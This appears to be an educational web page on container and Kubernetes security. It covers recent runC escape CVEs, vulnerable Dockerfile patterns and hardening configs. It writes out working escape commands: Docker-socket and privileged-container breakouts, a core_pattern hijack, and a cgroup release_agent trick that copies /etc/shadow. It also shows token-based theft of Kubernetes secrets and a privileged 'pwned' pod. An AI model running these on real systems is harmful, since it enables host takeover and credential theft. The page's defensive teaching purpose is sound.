Back to Learning Center
criticalK8s SecurityCWE-250CWE-269CWE-284

Container Security

Container security encompasses the protection of containerized applications from vulnerabilities that could allow attackers to escape isolation boundaries and compromise host systems. With the widespread adoption of Docker and Kubernetes, container escape vulnerabilities have become critical security concerns that can lead to complete infrastructure compromise.

What is Container Escape?

Container escape occurs when an attacker breaks out of the isolated container environment and gains access to the underlying host system. Containers are designed to provide process isolation, but vulnerabilities in the container runtime, kernel, or misconfigurations can allow attackers to breach these boundaries and potentially compromise the entire infrastructure.

Critical runC Vulnerabilities (2025)

In November 2025, three severe vulnerabilities were discovered in runC, the container runtime used by Docker and Kubernetes. These flaws allow attackers to escape containers and gain root access to the host system:

This flaw arises from runC's use of /dev/null to mask sensitive host files. Because runC doesn't properly verify that /dev/null is legitimate, attackers can swap it with a symlink during initialization, allowing arbitrary host paths to be bind-mounted into the container.

CVE-2025-52565: /dev/console Race Condition

The /dev/console bind mount can be exploited through race conditions and symlinks. This manipulation allows runC to mount an unexpected target inside the container before security protections are in place, granting write access to critical procfs entries.

CVE-2025-52881: Shared Mount Race

This vulnerability abuses race conditions with shared mounts to redirect runC writes to /proc files. Attackers can manipulate dangerous system files such as /proc/sysrq-trigger, potentially crashing systems or enabling privilege escalation.

NVIDIAScape Vulnerability

CVE-2025-23266 (NVIDIAScape) demonstrated how attackers can escape container isolation with minimal effort using the NVIDIA Container Toolkit. This vulnerability affects 37% of cloud environments using NVIDIA containers, with an attack vector requiring just a three-line exploit using LD_PRELOAD manipulation.

Vulnerable Dockerfile Patterns

dockerfile
# VULNERABLE: Running as root
FROM ubuntu:latest
RUN apt-get update && apt-get install -y app
# No USER directive - runs as root!
CMD ["./app"]

# VULNERABLE: Privileged mode in docker-compose
services:
  app:
    image: myapp
    privileged: true  # Full host access!
    cap_add:
      - SYS_ADMIN     # Dangerous capability

# VULNERABLE: Mounting Docker socket
services:
  app:
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock  # Container escape vector!

Container Escape Techniques

Docker Socket Escape

bash
# If Docker socket is mounted, escape is trivial
# From inside container:
docker run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh

# Or create a privileged container that mounts host root
docker run -v /:/host -it ubuntu chroot /host

Procfs Escape via core_pattern

bash
# If /proc/sys/kernel/core_pattern is writable:
echo '|/path/to/malicious_script' > /proc/sys/kernel/core_pattern

# Trigger a core dump - script executes on host
kill -SIGSEGV $$

Capability-Based Escape

bash
# Check dangerous capabilities
capsh --print

# CAP_SYS_ADMIN allows mounting
mount -t cgroup -o rdma cgroup /mnt
mkdir /mnt/x
echo 1 > /mnt/x/notify_on_release
echo "#!/bin/sh\ncat /etc/shadow > /output" > /cmd
echo "/cmd" > /mnt/release_agent

Kubernetes-Specific Attacks

The most prevalent Kubernetes attack vector involves API abuse, where attackers exploit exposed API endpoints, weak authentication, or misconfigured RBAC settings:

bash
# Check for exposed Kubernetes API
curl -k https://<k8s-api>:6443/api

# If service account token is accessible:
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -k -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default.svc/api/v1/namespaces/default/secrets

# Create privileged pod to escape
kubectl run pwned --image=ubuntu --restart=Never \
  --overrides='{"spec":{"hostPID":true,"hostNetwork":true,
  "containers":[{"name":"pwned","image":"ubuntu",
  "securityContext":{"privileged":true}}]}}'

Prevention Strategies

Secure Dockerfile

dockerfile
# SECURE: Multi-stage build with non-root user
FROM golang:1.21 AS builder
WORKDIR /app
COPY . .
RUN CGO_ENABLED=0 go build -o app

FROM alpine:3.19
RUN adduser -D -u 10001 appuser
USER appuser
COPY --from=builder /app/app /app
# Read-only root filesystem
CMD ["/app"]

Kubernetes Security Context

yaml
apiVersion: v1
kind: Pod
metadata:
  name: secure-pod
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 10001
    fsGroup: 10001
    seccompProfile:
      type: RuntimeDefault
  containers:
  - name: app
    image: myapp:latest
    securityContext:
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      capabilities:
        drop:
          - ALL

Pod Security Standards

yaml
# Enforce restricted pod security standard
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted

Security Checklist

• Update runC to version 1.2.8, 1.3.3, or 1.4.0-rc.3 or later

• Enable user namespaces for all containers to block serious attack vectors

• Use rootless containers where possible to limit vulnerability scope

• Never mount Docker socket inside containers

• Drop all capabilities and add only what's needed

• Implement strict image scanning to detect malicious Dockerfiles

• Use read-only root filesystems for containers

• Apply Pod Security Standards in Kubernetes namespaces

• Monitor for suspicious mount configurations and escape attempts

• Implement network policies to restrict container-to-container communication

Practice Challenges

View all